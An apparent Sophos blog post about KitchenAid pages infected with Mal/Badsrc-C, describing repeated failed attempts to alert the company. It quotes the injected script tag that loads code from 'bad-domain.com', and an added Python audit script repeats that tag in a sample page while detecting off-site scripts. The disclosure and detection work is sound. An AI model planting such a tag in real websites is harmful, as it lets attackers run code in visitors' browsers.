Update: SophosLabs can confirm that the website has now been cleaned up.
In August last year, SophosLabs first noticed that a Sophos customer was blocked from visiting a page on the KitchenAid website due to a detection of Mal/Badsrc-C.
Over the last six months I and several of my colleagues have been trying to talk to contacts at KitchenAid and Whirlpool to inform them of the issue and offer assistance. We have consistently hit brick walls.
When I initiate a crawl of the KitchenAid site, the crawler returns the following results:
4 instances of Mal/Badsrc-C found
hxxp://XXXXXXXXXXXXX.kitchenaid.com/main.asp?regID=N&counID=NN&langID=N
hxxp://XXXXXXXXXXXXX.kitchenaid.com/main.asp?regID=N&counID=NN&langID=N
hxxp://XXXXXXXXXXXXX.kitchenaid.com/main.asp?regID=N&counID=NN&langID=N
hxxp://XXXXXXXXXXXXX.kitchenaid.com/main.asp?regID=N&counID=NN&langID=N
In the above, the X’s represent letters and the N’s represent numbers.
Whenever I talk to customers and people in IT and tell them we find legitimate websites compromised by malicious code, their natural response is to say ‘Do you contact them?’
To which I reply, ‘We try but …’
- Emailing the address in the WHOIS records gets nowhere because the address is wrong, the mail goes nowhere, or the messages are not read.
- Emailing contact details on the websites suffers the same problems.
- Phoning up to find the IT department is difficult.
- Once you have found the IT department, finding someone who either understands or cares is time-consuming.
Some of the responses we do get back are so negative that we wonder why we bother.
The particular infected sites have multiple copies of a
<script src=http://bad-domain.com/b.js>
tag on their pages, and even though the site they point to is currently dead, there is no guarantee that it will stay that way.
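A site owner can check for the pattern described above with a short audit. This is an added example, not part of the original post or of any Sophos tooling: it parses a page, lists every script loaded from a host outside an allowlist, and counts how often each one repeats. The sample page, the host names www.example.com and cdn.example.net, and the function names are constructed for illustration.

```python
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a page."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")  # works for quoted and unquoted values
            if src:
                self.sources.append(src.strip())


def audit_scripts(html, page_host, allowed_hosts=()):
    """Return {src: count} for scripts loaded from hosts the site does not expect."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    collector.close()
    trusted = {page_host.lower(), *(h.lower() for h in allowed_hosts)}
    flagged = Counter()
    for src in collector.sources:
        host = urlparse(src).hostname  # None for relative (same-site) URLs
        if host and host not in trusted:
            flagged[src] += 1
    return dict(flagged)


# Constructed sample: two expected scripts plus a repeated injected tag.
SAMPLE_PAGE = """<html><head>
<script src="/js/menu.js"></script>
<script src="https://cdn.example.net/lib.js"></script>
</head><body><p>Mixers</p>
<script src=http://bad-domain.com/b.js></script>
<script src=http://bad-domain.com/b.js></script>
<script src=http://bad-domain.com/b.js></script>
</body></html>"""

if __name__ == "__main__":
    hits = audit_scripts(SAMPLE_PAGE, "www.example.com", ["cdn.example.net"])
    for src, count in hits.items():
        print(f"{count} x unexpected script: {src}")
```

A repeat count above one for the same off-site source is a useful signal in its own right, since legitimate templates rarely include the same script several times on one page.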
So why is the KitchenAid site still infected?
If you have any comments or answers then contact this blog via sophosblog@sophos.com.